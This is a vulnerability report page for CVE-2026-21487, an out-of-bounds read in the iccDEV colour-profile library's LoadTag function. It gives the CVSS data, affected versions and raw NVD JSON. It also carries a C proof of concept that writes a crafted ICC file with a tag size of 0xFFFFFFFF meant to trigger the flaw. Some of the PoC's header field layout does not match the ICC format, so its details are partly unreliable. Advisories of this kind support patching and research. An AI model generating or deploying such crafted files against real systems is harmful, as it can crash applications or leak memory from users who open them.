Security Vulnerability Report
CVE-2026-21487 CVSS 6.1 MEDIUM

Published: 2026-01-06 04:15:54
Last Modified: 2026-01-12 20:57:20

Description

iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1.1 and below are affected by an Out-of-bounds Read, Use of Out-of-range Pointer Offset and Improper Input Validation in the CIccProfile::LoadTag function. This issue is fixed in version 2.3.1.2.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE
iccDEV <= 2.3.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// PoC for CVE-2026-21487: iccDEV CIccProfile::LoadTag Out-of-bounds Read
// This PoC creates a malicious ICC profile file that triggers the vulnerability
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// ICC Profile Header (128 bytes)
unsigned char icc_header[128] = {
    0x00, 0x00, 0x0C, 0x74,                         // profile size (will be updated)
    'a', 'c', 's', 'p',                             // profile signature
    0x00, 0x00,                                     // preferred CMM type
    0x04, 0x00, 0x00, 0x00,                         // profile version
    0x00, 0x00, 0x00, 0x00,                         // profile/device class
    0x00, 0x00,                                     // color space
    0x00, 0x00,                                     // PCS
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00,             // creation date
    'm', 'n', 't', 'r',                             // profile file signature
    0x00, 0x00, 0x00, 0x00,                         // primary platform
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // flags
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // device manufacturer
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // device model
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // device attributes
    0x00, 0x00,                                     // rendering intent
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00,             // PCS illuminant
    'e', 'n', 'U', 'S',                             // creator
    0x00, 0x00, 0x00, 0x00,                         // profile ID
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00,             // reserved
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};

// Tag table entry with malicious size (triggers OOB read)
// signature, offset, size - size is set to a large value to trigger overflow
unsigned char tag_table[] = {
    0x64, 0x65, 0x73, 0x63, // 'desc' tag signature
    0x00, 0x00, 0x00, 0x84, // offset to tag data
    0xFF, 0xFF, 0xFF, 0xFF  // MALICIOUS SIZE - causes OOB read
};

// Malicious tag data
unsigned char malicious_tag[] = {
    0x00, 0x00, 0x00, 0x00 // minimal tag data
};

void create_malicious_icc(const char* filename) {
    FILE* fp = fopen(filename, "wb");
    if (!fp) {
        printf("Failed to create file\n");
        return;
    }

    // Write header
    fwrite(icc_header, 1, 128, fp);

    // Write tag count (big-endian: 1 tag)
    unsigned char tag_count[4] = {0x00, 0x00, 0x00, 0x01};
    fwrite(tag_count, 1, 4, fp);

    // Write malicious tag table entry
    fwrite(tag_table, 1, 12, fp);

    // Write malicious tag data
    fwrite(malicious_tag, 1, sizeof(malicious_tag), fp);

    fclose(fp);
    printf("Malicious ICC profile created: %s\n", filename);
}

int main() {
    create_malicious_icc("CVE-2026-21487-malicious.icc");
    printf("PoC for CVE-2026-21487 generated.\n");
    printf("The malicious ICC file has a tag with size=0xFFFFFFFF which triggers\n");
    printf("an out-of-bounds read in CIccProfile::LoadTag function.\n");
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21487", "sourceIdentifier": "[email protected]", "published": "2026-01-06T04:15:54.103", "lastModified": "2026-01-12T20:57:20.303", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1.1 and below have an Out-of-bounds Read, Use of Out-of-range Pointer Offset and have Improper Input Validation in its CIccProfile::LoadTag function. This issue is fixed in version 2.3.1.2."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas para trabajar con perfiles de gestión de color ICC. Las versiones 2.3.1.1 e inferiores presentan una lectura fuera de límites, uso de desplazamiento de puntero fuera de rango y validación de entrada inadecuada en su función CIccProfile::LoadTag. Este problema está corregido en la versión 2.3.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": 
"CWE-20"}, {"lang": "en", "value": "CWE-125"}, {"lang": "en", "value": "CWE-823"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/1516e2cafc253bb06fd3700d589a4ed0f09f7bd6", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/340", "source": "[email protected]", "tags": ["Issue Tracking", "Exploit", "Vendor Advisory"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-xq7x-9524-f7cp", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}